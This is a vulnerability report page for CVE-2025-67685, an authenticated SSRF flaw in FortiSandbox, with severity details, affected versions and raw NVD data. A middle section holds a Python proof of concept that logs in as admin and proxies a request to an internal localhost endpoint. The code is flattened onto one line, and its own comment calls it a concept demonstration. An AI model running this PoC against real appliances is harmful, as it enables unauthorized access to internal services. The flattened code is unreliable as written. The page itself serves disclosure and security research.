Security Vulnerability Report
中文
CVE-2025-67685 CVSS 3.8 LOW

CVE-2025-67685

Published: 2026-01-13 17:15:59
Last Modified: 2026-01-14 21:38:02
Source: [email protected]

Description

A Server-Side Request Forgery (SSRF) vulnerability [CWE-918] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.4, FortiSandbox 4.4 all versions, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an authenticated attacker to proxy internal requests limited to plaintext endpoints only via crafted HTTP requests.

CVSS Details

CVSS Score
3.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:* - VULNERABLE
FortiSandbox 5.0.0 - 5.0.4
FortiSandbox 4.4 (所有版本)
FortiSandbox 4.2 (所有版本)
FortiSandbox 4.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # CVE-2025-67685 PoC - SSRF in FortiSandbox # Target: FortiSandbox < 5.0.5 TARGET = "https://<fortisandbox-ip>/" LOGIN_URL = TARGET + "api/v1/user/login" SSRF_URL = TARGET + "api/v1/scan/http-proxy" session = requests.Session() # Step 1: Authenticate with high-privilege account login_data = { "username": "admin", "password": "<password>" } response = session.post(LOGIN_URL, json=login_data, verify=False) token = response.json().get("token") headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Step 2: Exploit SSRF to access internal plaintext endpoint ssrf_payload = { "url": "http://127.0.0.1:8080/internal/api/config", "method": "GET", "headers": {} } response = session.post(SSRF_URL, json=ssrf_payload, headers=headers, verify=False) print(f"SSRF Response: {response.status_code}") print(f"Content: {response.text}") # Note: This PoC demonstrates the SSRF vulnerability concept. # Actual exploitation requires valid credentials with high privileges. # Target internal endpoints vary based on deployment configuration.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67685", "sourceIdentifier": "[email protected]", "published": "2026-01-13T17:15:58.873", "lastModified": "2026-01-14T21:38:01.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Server-Side Request Forgery (SSRF) vulnerability [CWE-918] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.4, FortiSandbox 4.4 all versions, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an authenticated attacker to proxy internal requests limited to plaintext endpoints only via crafted HTTP requests."}, {"lang": "es", "value": "Una vulnerabilidad de falsificación de petición del lado del servidor (SSRF) [CWE-918] vulnerabilidad en Fortinet FortiSandbox 5.0.0 hasta 5.0.4, FortiSandbox 4.4 todas las versiones, FortiSandbox 4.2 todas las versiones, FortiSandbox 4.0 todas las versiones puede permitir a un atacante autenticado redirigir peticiones internas limitadas solo a puntos finales de texto plano a través de peticiones HTTP manipuladas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "5.0.5", "matchCriteriaId": "FA72A521-E480-4B98-8BB3-F549D0126E19"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-783", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.